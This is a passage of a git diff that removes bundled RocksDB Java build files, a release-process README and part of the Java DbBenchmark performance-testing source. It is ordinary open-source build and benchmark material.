-	org.rocksdb.WriteBatchTest\
-	org.rocksdb.WriteBatchThreadedTest\
-	org.rocksdb.WriteOptionsTest\
-	org.rocksdb.WriteBatchWithIndexTest
-
-MAIN_SRC = src/main/java
-TEST_SRC = src/test/java
-OUTPUT = target
-MAIN_CLASSES = $(OUTPUT)/classes
-TEST_CLASSES = $(OUTPUT)/test-classes
-JAVADOC = $(OUTPUT)/apidocs
-
-BENCHMARK_MAIN_SRC = benchmark/src/main/java
-BENCHMARK_OUTPUT = benchmark/target
-BENCHMARK_MAIN_CLASSES = $(BENCHMARK_OUTPUT)/classes
-
-SAMPLES_MAIN_SRC = samples/src/main/java
-SAMPLES_OUTPUT = samples/target
-SAMPLES_MAIN_CLASSES = $(SAMPLES_OUTPUT)/classes
-
-JAVA_TEST_LIBDIR = test-libs
-JAVA_JUNIT_JAR = $(JAVA_TEST_LIBDIR)/junit-4.12.jar
-JAVA_HAMCR_JAR = $(JAVA_TEST_LIBDIR)/hamcrest-core-1.3.jar
-JAVA_MOCKITO_JAR = $(JAVA_TEST_LIBDIR)/mockito-all-1.10.19.jar
-JAVA_CGLIB_JAR = $(JAVA_TEST_LIBDIR)/cglib-2.2.2.jar
-JAVA_ASSERTJ_JAR = $(JAVA_TEST_LIBDIR)/assertj-core-1.7.1.jar
-JAVA_TESTCLASSPATH = $(JAVA_JUNIT_JAR):$(JAVA_HAMCR_JAR):$(JAVA_MOCKITO_JAR):$(JAVA_CGLIB_JAR):$(JAVA_ASSERTJ_JAR)
-
-MVN_LOCAL = ~/.m2/repository
-
-# Set the default JAVA_ARGS to "" for DEBUG_LEVEL=0
-JAVA_ARGS? =
-
-JAVAC_ARGS? =
-
-# When debugging add -Xcheck:jni to the java args
-ifneq ($(DEBUG_LEVEL),0)
-	JAVA_ARGS = -ea -Xcheck:jni
-	JAVAC_ARGS = -Xlint:deprecation -Xlint:unchecked
-endif
-
-SEARCH_REPO_URL?=http://search.maven.org/remotecontent?filepath=
-CENTRAL_REPO_URL?=http://central.maven.org/maven2/
-
-clean:
-	$(AM_V_at)rm -rf include/*
-	$(AM_V_at)rm -rf test-libs/
-	$(AM_V_at)rm -rf $(OUTPUT)
-	$(AM_V_at)rm -rf $(BENCHMARK_OUTPUT)
-	$(AM_V_at)rm -rf $(SAMPLES_OUTPUT)
-
-
-javadocs: java
-	$(AM_V_GEN)mkdir -p $(JAVADOC)
-	$(AM_V_at)javadoc -d $(JAVADOC) -sourcepath $(MAIN_SRC) -subpackages org
-
-javalib: java java_test javadocs
-
-java:
-	$(AM_V_GEN)mkdir -p $(MAIN_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -d $(MAIN_CLASSES)\
-		$(MAIN_SRC)/org/rocksdb/util/*.java\
-		$(MAIN_SRC)/org/rocksdb/*.java
-	$(AM_V_at)@cp ../HISTORY.md ./HISTORY-CPP.md
-	$(AM_V_at)@rm -f ./HISTORY-CPP.md
-	$(AM_V_at)javah -cp $(MAIN_CLASSES) -d $(NATIVE_INCLUDE) -jni $(NATIVE_JAVA_CLASSES)
-
-sample: java
-	$(AM_V_GEN)mkdir -p $(SAMPLES_MAIN_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -cp $(MAIN_CLASSES) -d $(SAMPLES_MAIN_CLASSES) $(SAMPLES_MAIN_SRC)/RocksDBSample.java
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni_not_found
-	java $(JAVA_ARGS) -Djava.library.path=target -cp $(MAIN_CLASSES):$(SAMPLES_MAIN_CLASSES) RocksDBSample /tmp/rocksdbjni
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni_not_found
-
-column_family_sample: java
-	$(AM_V_GEN)mkdir -p $(SAMPLES_MAIN_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -cp $(MAIN_CLASSES) -d $(SAMPLES_MAIN_CLASSES) $(SAMPLES_MAIN_SRC)/RocksDBColumnFamilySample.java
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni
-	java $(JAVA_ARGS) -Djava.library.path=target -cp $(MAIN_CLASSES):$(SAMPLES_MAIN_CLASSES) RocksDBColumnFamilySample /tmp/rocksdbjni
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni
-
-resolve_test_deps:
-	test -d "$(JAVA_TEST_LIBDIR)" || mkdir -p "$(JAVA_TEST_LIBDIR)"
-	test -s "$(JAVA_JUNIT_JAR)" || cp $(MVN_LOCAL)/junit/junit/4.12/junit-4.12.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o $(JAVA_JUNIT_JAR) $(SEARCH_REPO_URL)junit/junit/4.12/junit-4.12.jar
-	test -s "$(JAVA_HAMCR_JAR)" || cp $(MVN_LOCAL)/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o $(JAVA_HAMCR_JAR) $(SEARCH_REPO_URL)org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar
-	test -s "$(JAVA_MOCKITO_JAR)" || cp $(MVN_LOCAL)/org/mockito/mockito-all/1.10.19/mockito-all-1.10.19.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o "$(JAVA_MOCKITO_JAR)" $(SEARCH_REPO_URL)org/mockito/mockito-all/1.10.19/mockito-all-1.10.19.jar
-	test -s "$(JAVA_CGLIB_JAR)" || cp $(MVN_LOCAL)/cglib/cglib/2.2.2/cglib-2.2.2.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o "$(JAVA_CGLIB_JAR)" $(SEARCH_REPO_URL)cglib/cglib/2.2.2/cglib-2.2.2.jar
-	test -s "$(JAVA_ASSERTJ_JAR)" || cp $(MVN_LOCAL)/org/assertj/assertj-core/1.7.1/assertj-core-1.7.1.jar $(JAVA_TEST_LIBDIR) || curl -k -L -o "$(JAVA_ASSERTJ_JAR)" $(CENTRAL_REPO_URL)org/assertj/assertj-core/1.7.1/assertj-core-1.7.1.jar
-
-java_test: java resolve_test_deps
-	$(AM_V_GEN)mkdir -p $(TEST_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -cp $(MAIN_CLASSES):$(JAVA_TESTCLASSPATH) -d $(TEST_CLASSES)\
-		$(TEST_SRC)/org/rocksdb/test/*.java\
-		$(TEST_SRC)/org/rocksdb/util/*.java\
-		$(TEST_SRC)/org/rocksdb/*.java
-	$(AM_V_at)javah -cp $(MAIN_CLASSES):$(TEST_CLASSES) -d $(NATIVE_INCLUDE) -jni $(NATIVE_JAVA_TEST_CLASSES)
-
-test: java java_test run_test
-
-run_test:
-	java $(JAVA_ARGS) -Djava.library.path=target -cp "$(MAIN_CLASSES):$(TEST_CLASSES):$(JAVA_TESTCLASSPATH):target/*" org.rocksdb.test.RocksJunitRunner $(JAVA_TESTS)
-
-db_bench: java
-	$(AM_V_GEN)mkdir -p $(BENCHMARK_MAIN_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -cp $(MAIN_CLASSES) -d $(BENCHMARK_MAIN_CLASSES) $(BENCHMARK_MAIN_SRC)/org/rocksdb/benchmark/*.java
diff --git a/thirdparty/rocksdb/java/RELEASE.md b/thirdparty/rocksdb/java/RELEASE.md
deleted file mode 100644
index cb9aaf9..0000000
--- a/thirdparty/rocksdb/java/RELEASE.md
+++ /dev/null
@@ -1,54 +0,0 @@
-## Cross-building
-
-RocksDB can be built as a single self contained cross-platform JAR. The cross-platform jar can be usd on any 64-bit OSX system, 32-bit Linux system, or 64-bit Linux system.
-
-Building a cross-platform JAR requires:
-
- * [Vagrant](https://www.vagrantup.com/)
- * [Virtualbox](https://www.virtualbox.org/)
- * A Mac OSX machine that can compile RocksDB.
- * Java 7 set as JAVA_HOME.
-
-Once you have these items, run this make command from RocksDB's root source directory:
-
-    make jclean clean rocksdbjavastaticrelease
-
-This command will build RocksDB natively on OSX, and will then spin up two Vagrant Virtualbox Ubuntu images to build RocksDB for both 32-bit and 64-bit Linux. 
-
-You can find all native binaries and JARs in the java/target directory upon completion:
-
-    librocksdbjni-linux32.so
-    librocksdbjni-linux64.so
-    librocksdbjni-osx.jnilib
-    rocksdbjni-3.5.0-javadoc.jar
-    rocksdbjni-3.5.0-linux32.jar
-    rocksdbjni-3.5.0-linux64.jar
-    rocksdbjni-3.5.0-osx.jar
-    rocksdbjni-3.5.0-sources.jar
-    rocksdbjni-3.5.0.jar
-
-## Maven publication
-
-Set ~/.m2/settings.xml to contain:
-
-    <settings xmlns="http://maven.apache.org/SETTINGS/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">
-      <servers>
-        <server>
-          <id>sonatype-nexus-staging</id>
-          <username>your-sonatype-jira-username</username>
-          <password>your-sonatype-jira-password</password>
-        </server>
-      </servers>
-    </settings>
-
-From RocksDB's root directory, first build the Java static JARs:
-
-    make jclean clean rocksdbjavastaticpublish
-
-This command will [stage the JAR artifacts on the Sonatype staging repository](http://central.sonatype.org/pages/manual-staging-bundle-creation-and-deployment.html). To release the staged artifacts.
-
-1. Go to [https://oss.sonatype.org/#stagingRepositories](https://oss.sonatype.org/#stagingRepositories) and search for "rocksdb" in the upper right hand search box.
-2. Select the rocksdb staging repository, and inspect its contents.
-3. If all is well, follow [these steps](https://oss.sonatype.org/#stagingRepositories) to close the repository and release it.
-
-After the release has occurred, the artifacts will be synced to Maven central within 24-48 hours.
diff --git a/thirdparty/rocksdb/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java b/thirdparty/rocksdb/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java
deleted file mode 100644
index 8af6d2e..0000000
--- a/thirdparty/rocksdb/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java
+++ /dev/null
@@ -1,1648 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-/**
- * Copyright (C) 2011 the original author or authors.
- * See the notice.md file distributed with this work for additional
- * information regarding copyright ownership.
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- *     http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package org.rocksdb.benchmark;
-
-import java.io.IOException;
-import java.lang.Runnable;
-import java.lang.Math;
-import java.io.File;
-import java.lang.reflect.Constructor;
-import java.lang.reflect.InvocationTargetException;
-import java.nio.ByteBuffer;
-import java.nio.file.Files;
-import java.util.Collection;
-import java.util.Date;
-import java.util.EnumMap;
-import java.util.List;
-import java.util.Map;
-import java.util.Random;
-import java.util.concurrent.TimeUnit;
-import java.util.Arrays;
-import java.util.ArrayList;
-import java.util.concurrent.Callable;
-import java.util.concurrent.Executors;
-import java.util.concurrent.ExecutorService;
-import java.util.concurrent.Future;
-import java.util.concurrent.TimeUnit;
-import org.rocksdb.*;
-import org.rocksdb.RocksMemEnv;
-import org.rocksdb.util.SizeUnit;
-
-class Stats {
-  int id_;
-  long start_;
-  long finish_;
-  double seconds_;
-  long done_;
-  long found_;
-  long lastOpTime_;
-  long nextReport_;
-  long bytes_;
-  StringBuilder message_;
-  boolean excludeFromMerge_;
-
-  // TODO(yhchiang): use the following arguments:
-  //   (Long)Flag.stats_interval
-  //   (Integer)Flag.stats_per_interval
-
-  Stats(int id) {
-    id_ = id;
-    nextReport_ = 100;
-    done_ = 0;
-    bytes_ = 0;
-    seconds_ = 0;
-    start_ = System.nanoTime();
-    lastOpTime_ = start_;
-    finish_ = start_;
-    found_ = 0;
-    message_ = new StringBuilder("");
-    excludeFromMerge_ = false;
-  }
-
-  void merge(final Stats other) {
-    if (other.excludeFromMerge_) {
-      return;
-    }
-
-    done_ += other.done_;
-    found_ += other.found_;
-    bytes_ += other.bytes_;
-    seconds_ += other.seconds_;
-    if (other.start_ < start_) start_ = other.start_;
-    if (other.finish_ > finish_) finish_ = other.finish_;
-
-    // Just keep the messages from one thread
-    if (message_.length() == 0) {
-      message_ = other.message_;
-    }
-  }
-
-  void stop() {
-    finish_ = System.nanoTime();
-    seconds_ = (double) (finish_ - start_) * 1e-9;
-  }
-
-  void addMessage(String msg) {
-    if (message_.length() > 0) {
-      message_.append(" ");
-    }
-    message_.append(msg);
-  }
-
-  void setId(int id) { id_ = id; }
-  void setExcludeFromMerge() { excludeFromMerge_ = true; }
-
-  void finishedSingleOp(int bytes) {
-    done_++;
-    lastOpTime_ = System.nanoTime();
-    bytes_ += bytes;
-    if (done_ >= nextReport_) {
-      if (nextReport_ < 1000) {
-        nextReport_ += 100;
-      } else if (nextReport_ < 5000) {
-        nextReport_ += 500;
-      } else if (nextReport_ < 10000) {
-        nextReport_ += 1000;
-      } else if (nextReport_ < 50000) {
-        nextReport_ += 5000;
-      } else if (nextReport_ < 100000) {
-        nextReport_ += 10000;
-      } else if (nextReport_ < 500000) {
-        nextReport_ += 50000;
-      } else {
-        nextReport_ += 100000;
-      }
-      System.err.printf("... Task %s finished %d ops%30s\r", id_, done_, "");
-    }
-  }
-
-  void report(String name) {
-    // Pretend at least one op was done in case we are running a benchmark
-    // that does not call FinishedSingleOp().
-    if (done_ < 1) done_ = 1;
-
-    StringBuilder extra = new StringBuilder("");
-    if (bytes_ > 0) {
-      // Rate is computed on actual elapsed time, not the sum of per-thread
-      // elapsed times.
-      double elapsed = (finish_ - start_) * 1e-9;
-      extra.append(String.format("%6.1f MB/s", (bytes_ / 1048576.0) / elapsed));
-    }
-    extra.append(message_.toString());
-    double elapsed = (finish_ - start_);
-    double throughput = (double) done_ / (elapsed * 1e-9);
-
-    System.out.format("%-12s : %11.3f micros/op %d ops/sec;%s%s\n",
-            name, (elapsed * 1e-6) / done_,
-            (long) throughput, (extra.length() == 0 ? "" : " "), extra.toString());
-  }
-}
-
-public class DbBenchmark {
-  enum Order {
-    SEQUENTIAL,
-    RANDOM
-  }
-
-  enum DBState {
-    FRESH,
-    EXISTING
-  }
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  abstract class BenchmarkTask implements Callable<Stats> {
-    // TODO(yhchiang): use (Integer)Flag.perf_level.
-    public BenchmarkTask(
-        int tid, long randSeed, long numEntries, long keyRange) {
-      tid_ = tid;
-      rand_ = new Random(randSeed + tid * 1000);
-      numEntries_ = numEntries;
-      keyRange_ = keyRange;
-      stats_ = new Stats(tid);
-    }
-
-    @Override public Stats call() throws RocksDBException {
-      stats_.start_ = System.nanoTime();
-      runTask();
-      stats_.finish_ = System.nanoTime();
-      return stats_;
-    }
-
-    abstract protected void runTask() throws RocksDBException;
-
-    protected int tid_;
-    protected Random rand_;
-    protected long numEntries_;
-    protected long keyRange_;
-    protected Stats stats_;
-
-    protected void getFixedKey(byte[] key, long sn) {
-      generateKeyFromLong(key, sn);
-    }
-
-    protected void getRandomKey(byte[] key, long range) {
-      generateKeyFromLong(key, Math.abs(rand_.nextLong() % range));
-    }
-  }
-
-  abstract class WriteTask extends BenchmarkTask {
-    public WriteTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch) {
-      super(tid, randSeed, numEntries, keyRange);
-      writeOpt_ = writeOpt;
-      entriesPerBatch_ = entriesPerBatch;
-      maxWritesPerSecond_ = -1;
-    }
-
-    public WriteTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch, long maxWritesPerSecond) {
-      super(tid, randSeed, numEntries, keyRange);
-      writeOpt_ = writeOpt;
-      entriesPerBatch_ = entriesPerBatch;
-      maxWritesPerSecond_ = maxWritesPerSecond;
-    }
-
-    @Override public void runTask() throws RocksDBException {
-      if (numEntries_ != DbBenchmark.this.num_) {
-        stats_.message_.append(String.format(" (%d ops)", numEntries_));
-      }
-      byte[] key = new byte[keySize_];
-      byte[] value = new byte[valueSize_];
-
-      try {
-        if (entriesPerBatch_ == 1) {
-          for (long i = 0; i < numEntries_; ++i) {
-            getKey(key, i, keyRange_);
-            DbBenchmark.this.gen_.generate(value);
-            db_.put(writeOpt_, key, value);
-            stats_.finishedSingleOp(keySize_ + valueSize_);
-            writeRateControl(i);
-            if (isFinished()) {
-              return;
-            }
-          }
-        } else {
-          for (long i = 0; i < numEntries_; i += entriesPerBatch_) {
-            WriteBatch batch = new WriteBatch();
-            for (long j = 0; j < entriesPerBatch_; j++) {
-              getKey(key, i + j, keyRange_);
-              DbBenchmark.this.gen_.generate(value);
-              batch.put(key, value);
-              stats_.finishedSingleOp(keySize_ + valueSize_);
-            }
-            db_.write(writeOpt_, batch);
-            batch.dispose();
-            writeRateControl(i);
-            if (isFinished()) {
-              return;
-            }
-          }
-        }
-      } catch (InterruptedException e) {
-        // thread has been terminated.
-      }
-    }
-
-    protected void writeRateControl(long writeCount)
-        throws InterruptedException {
-      if (maxWritesPerSecond_ <= 0) return;
-      long minInterval =
-          writeCount * TimeUnit.SECONDS.toNanos(1) / maxWritesPerSecond_;
-      long interval = System.nanoTime() - stats_.start_;
-      if (minInterval - interval > TimeUnit.MILLISECONDS.toNanos(1)) {
-        TimeUnit.NANOSECONDS.sleep(minInterval - interval);
-      }
-    }
-
-    abstract protected void getKey(byte[] key, long id, long range);
-    protected WriteOptions writeOpt_;
-    protected long entriesPerBatch_;
-    protected long maxWritesPerSecond_;
-  }
-
-  class WriteSequentialTask extends WriteTask {
-    public WriteSequentialTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch);
-    }
-    public WriteSequentialTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch,
-        long maxWritesPerSecond) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch,
-            maxWritesPerSecond);
-    }
-    @Override protected void getKey(byte[] key, long id, long range) {
-      getFixedKey(key, id);
-    }
-  }
-
-  class WriteRandomTask extends WriteTask {
-    public WriteRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch);
-    }
-    public WriteRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch,
-        long maxWritesPerSecond) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch,
-            maxWritesPerSecond);
-    }
-    @Override protected void getKey(byte[] key, long id, long range) {
-      getRandomKey(key, range);
-    }
-  }
-
-  class WriteUniqueRandomTask extends WriteTask {
-    static final int MAX_BUFFER_SIZE = 10000000;
-    public WriteUniqueRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch);
-      initRandomKeySequence();
-    }
-    public WriteUniqueRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange,
-        WriteOptions writeOpt, long entriesPerBatch,
-        long maxWritesPerSecond) {
-      super(tid, randSeed, numEntries, keyRange,
-            writeOpt, entriesPerBatch,
-            maxWritesPerSecond);
-      initRandomKeySequence();
-    }
-    @Override protected void getKey(byte[] key, long id, long range) {
-      generateKeyFromLong(key, nextUniqueRandom());
-    }
-
-    protected void initRandomKeySequence() {
-      bufferSize_ = MAX_BUFFER_SIZE;
-      if (bufferSize_ > keyRange_) {
-        bufferSize_ = (int) keyRange_;
-      }
-      currentKeyCount_ = bufferSize_;
-      keyBuffer_ = new long[MAX_BUFFER_SIZE];
-      for (int k = 0; k < bufferSize_; ++k) {
-        keyBuffer_[k] = k;
-      }
-    }
-
-    /**
-     * Semi-randomly return the next unique key.  It is guaranteed to be
-     * fully random if keyRange_ <= MAX_BUFFER_SIZE.
-     */
-    long nextUniqueRandom() {
-      if (bufferSize_ == 0) {
-        System.err.println("bufferSize_ == 0.");
-        return 0;
-      }
-      int r = rand_.nextInt(bufferSize_);
-      // randomly pick one from the keyBuffer
-      long randKey = keyBuffer_[r];
-      if (currentKeyCount_ < keyRange_) {
-        // if we have not yet inserted all keys, insert next new key to [r].
-        keyBuffer_[r] = currentKeyCount_++;
-      } else {
-        // move the last element to [r] and decrease the size by 1.
-        keyBuffer_[r] = keyBuffer_[--bufferSize_];
-      }
-      return randKey;
-    }
-
-    int bufferSize_;
-    long currentKeyCount_;
-    long[] keyBuffer_;
-  }
-
-  class ReadRandomTask extends BenchmarkTask {
-    public ReadRandomTask(
-        int tid, long randSeed, long numEntries, long keyRange) {
-      super(tid, randSeed, numEntries, keyRange);
-    }
-    @Override public void runTask() throws RocksDBException {
-      byte[] key = new byte[keySize_];
-      byte[] value = new byte[valueSize_];
-      for (long i = 0; i < numEntries_; i++) {
-        getRandomKey(key, keyRange_);
-        int len = db_.get(key, value);
-        if (len != RocksDB.NOT_FOUND) {
-          stats_.found_++;
-          stats_.finishedSingleOp(keySize_ + valueSize_);
-        } else {
-          stats_.finishedSingleOp(keySize_);
-        }
-        if (isFinished()) {
-          return;
-        }
-      }
-    }
-  }
-
-  class ReadSequentialTask extends BenchmarkTask {
-    public ReadSequentialTask(
-        int tid, long randSeed, long numEntries, long keyRange) {
-      super(tid, randSeed, numEntries, keyRange);
-    }
-    @Override public void runTask() throws RocksDBException {
-      RocksIterator iter = db_.newIterator();
-      long i;
-      for (iter.seekToFirst(), i = 0;
-           iter.isValid() && i < numEntries_;
-           iter.next(), ++i) {
-        stats_.found_++;
-        stats_.finishedSingleOp(iter.key().length + iter.value().length);
-        if (isFinished()) {
-          iter.dispose();
-          return;
-        }
-      }
-      iter.dispose();
-    }
-  }
-
-  public DbBenchmark(Map<Flag, Object> flags) throws Exception {
-    benchmarks_ = (List<String>) flags.get(Flag.benchmarks);
-    num_ = (Integer) flags.get(Flag.num);
-    threadNum_ = (Integer) flags.get(Flag.threads);
-    reads_ = (Integer) (flags.get(Flag.reads) == null ?
-        flags.get(Flag.num) : flags.get(Flag.reads));
-    keySize_ = (Integer) flags.get(Flag.key_size);
-    valueSize_ = (Integer) flags.get(Flag.value_size);
-    compressionRatio_ = (Double) flags.get(Flag.compression_ratio);
-    useExisting_ = (Boolean) flags.get(Flag.use_existing_db);
-    randSeed_ = (Long) flags.get(Flag.seed);
-    databaseDir_ = (String) flags.get(Flag.db);
-    writesPerSeconds_ = (Integer) flags.get(Flag.writes_per_second);
-    memtable_ = (String) flags.get(Flag.memtablerep);
-    maxWriteBufferNumber_ = (Integer) flags.get(Flag.max_write_buffer_number);
-    prefixSize_ = (Integer) flags.get(Flag.prefix_size);
-    keysPerPrefix_ = (Integer) flags.get(Flag.keys_per_prefix);
-    hashBucketCount_ = (Long) flags.get(Flag.hash_bucket_count);
-    usePlainTable_ = (Boolean) flags.get(Flag.use_plain_table);
-    useMemenv_ = (Boolean) flags.get(Flag.use_mem_env);
-    flags_ = flags;
-    finishLock_ = new Object();
-    // options.setPrefixSize((Integer)flags_.get(Flag.prefix_size));
-    // options.setKeysPerPrefix((Long)flags_.get(Flag.keys_per_prefix));
-    compressionType_ = (String) flags.get(Flag.compression_type);
-    compression_ = CompressionType.NO_COMPRESSION;
-    try {
-      if (compressionType_!=null) {
-          final CompressionType compressionType =
-              CompressionType.getCompressionType(compressionType_);
-          if (compressionType != null &&
-              compressionType != CompressionType.NO_COMPRESSION) {
-            System.loadLibrary(compressionType.getLibraryName());
-          }
-
-      }
-    } catch (UnsatisfiedLinkError e) {
-      System.err.format("Unable to load %s library:%s%n" +
-                        "No compression is used.%n",
-          compressionType_, e.toString());
-      compressionType_ = "none";
-    }
-    gen_ = new RandomGenerator(randSeed_, compressionRatio_);
-  }
-
-  private void prepareReadOptions(ReadOptions options) {
-    options.setVerifyChecksums((Boolean)flags_.get(Flag.verify_checksum));
-    options.setTailing((Boolean)flags_.get(Flag.use_tailing_iterator));
-  }
-
-  private void prepareWriteOptions(WriteOptions options) {
-    options.setSync((Boolean)flags_.get(Flag.sync));
-    options.setDisableWAL((Boolean)flags_.get(Flag.disable_wal));
-  }
-
-  private void prepareOptions(Options options) throws RocksDBException {
-    if (!useExisting_) {
-      options.setCreateIfMissing(true);
-    } else {
-      options.setCreateIfMissing(false);
-    }
-    if (useMemenv_) {
-      options.setEnv(new RocksMemEnv());
-    }
-    switch (memtable_) {
-      case "skip_list":
-        options.setMemTableConfig(new SkipListMemTableConfig());
-        break;
-      case "vector":
-        options.setMemTableConfig(new VectorMemTableConfig());
-        break;
-      case "hash_linkedlist":
-        options.setMemTableConfig(
-            new HashLinkedListMemTableConfig()
-                .setBucketCount(hashBucketCount_));
-        options.useFixedLengthPrefixExtractor(prefixSize_);
-        break;
-      case "hash_skiplist":
-      case "prefix_hash":
-        options.setMemTableConfig(
-            new HashSkipListMemTableConfig()
-                .setBucketCount(hashBucketCount_));
-        options.useFixedLengthPrefixExtractor(prefixSize_);
-        break;
-      default:
-        System.err.format(
-            "unable to detect the specified memtable, " +
-                "use the default memtable factory %s%n",
-            options.memTableFactoryName());
-        break;
-    }
-    if (usePlainTable_) {
-      options.setTableFormatConfig(
-          new PlainTableConfig().setKeySize(keySize_));
-    } else {
-      BlockBasedTableConfig table_options = new BlockBasedTableConfig();
-      table_options.setBlockSize((Long)flags_.get(Flag.block_size))
-                   .setBlockCacheSize((Long)flags_.get(Flag.cache_size))
-                   .setCacheNumShardBits(
-                      (Integer)flags_.get(Flag.cache_numshardbits));
-      options.setTableFormatConfig(table_options);
-    }
-    options.setWriteBufferSize(
-        (Long)flags_.get(Flag.write_buffer_size));
-    options.setMaxWriteBufferNumber(
-        (Integer)flags_.get(Flag.max_write_buffer_number));
-    options.setMaxBackgroundCompactions(
-        (Integer)flags_.get(Flag.max_background_compactions));
-    options.getEnv().setBackgroundThreads(
-        (Integer)flags_.get(Flag.max_background_compactions));
-    options.setMaxBackgroundFlushes(
-        (Integer)flags_.get(Flag.max_background_flushes));
-    options.setMaxOpenFiles(
-        (Integer)flags_.get(Flag.open_files));
-    options.setUseFsync(
-        (Boolean)flags_.get(Flag.use_fsync));
-    options.setWalDir(
-        (String)flags_.get(Flag.wal_dir));
-    options.setDeleteObsoleteFilesPeriodMicros(
-        (Integer)flags_.get(Flag.delete_obsolete_files_period_micros));
-    options.setTableCacheNumshardbits(
-        (Integer)flags_.get(Flag.table_cache_numshardbits));
-    options.setAllowMmapReads(
-        (Boolean)flags_.get(Flag.mmap_read));
-    options.setAllowMmapWrites(
-        (Boolean)flags_.get(Flag.mmap_write));
-    options.setAdviseRandomOnOpen(
-        (Boolean)flags_.get(Flag.advise_random_on_open));
-    options.setUseAdaptiveMutex(
-        (Boolean)flags_.get(Flag.use_adaptive_mutex));
-    options.setBytesPerSync(
-        (Long)flags_.get(Flag.bytes_per_sync));
-    options.setBloomLocality(
-        (Integer)flags_.get(Flag.bloom_locality));
-    options.setMinWriteBufferNumberToMerge(
-        (Integer)flags_.get(Flag.min_write_buffer_number_to_merge));
-    options.setMemtablePrefixBloomSizeRatio((Double) flags_.get(Flag.memtable_bloom_size_ratio));
-    options.setNumLevels(
-        (Integer)flags_.get(Flag.num_levels));
-    options.setTargetFileSizeBase(
-        (Integer)flags_.get(Flag.target_file_size_base));
-    options.setTargetFileSizeMultiplier((Integer)flags_.get(Flag.target_file_size_multiplier));
-    options.setMaxBytesForLevelBase(
-        (Integer)flags_.get(Flag.max_bytes_for_level_base));
-    options.setMaxBytesForLevelMultiplier((Double) flags_.get(Flag.max_bytes_for_level_multiplier));
-    options.setLevelZeroStopWritesTrigger(
-        (Integer)flags_.get(Flag.level0_stop_writes_trigger));
-    options.setLevelZeroSlowdownWritesTrigger(
-        (Integer)flags_.get(Flag.level0_slowdown_writes_trigger));
-    options.setLevelZeroFileNumCompactionTrigger(
-        (Integer)flags_.get(Flag.level0_file_num_compaction_trigger));
-    options.setMaxCompactionBytes(
-        (Long) flags_.get(Flag.max_compaction_bytes));
-    options.setDisableAutoCompactions(
-        (Boolean)flags_.get(Flag.disable_auto_compactions));
-    options.setMaxSuccessiveMerges(
-        (Integer)flags_.get(Flag.max_successive_merges));
-    options.setWalTtlSeconds((Long)flags_.get(Flag.wal_ttl_seconds));
-    options.setWalSizeLimitMB((Long)flags_.get(Flag.wal_size_limit_MB));
-    if(flags_.get(Flag.java_comparator) != null) {
-      options.setComparator(
-          (AbstractComparator)flags_.get(Flag.java_comparator));
-    }
-
-    /* TODO(yhchiang): enable the following parameters
-    options.setCompressionType((String)flags_.get(Flag.compression_type));
-    options.setCompressionLevel((Integer)flags_.get(Flag.compression_level));
-    options.setMinLevelToCompress((Integer)flags_.get(Flag.min_level_to_compress));
-    options.setHdfs((String)flags_.get(Flag.hdfs)); // env
-    options.setStatistics((Boolean)flags_.get(Flag.statistics));
-    options.setUniversalSizeRatio(
-        (Integer)flags_.get(Flag.universal_size_ratio));
-    options.setUniversalMinMergeWidth(
-        (Integer)flags_.get(Flag.universal_min_merge_width));
-    options.setUniversalMaxMergeWidth(
-        (Integer)flags_.get(Flag.universal_max_merge_width));
-    options.setUniversalMaxSizeAmplificationPercent(
-        (Integer)flags_.get(Flag.universal_max_size_amplification_percent));
-    options.setUniversalCompressionSizePercent(
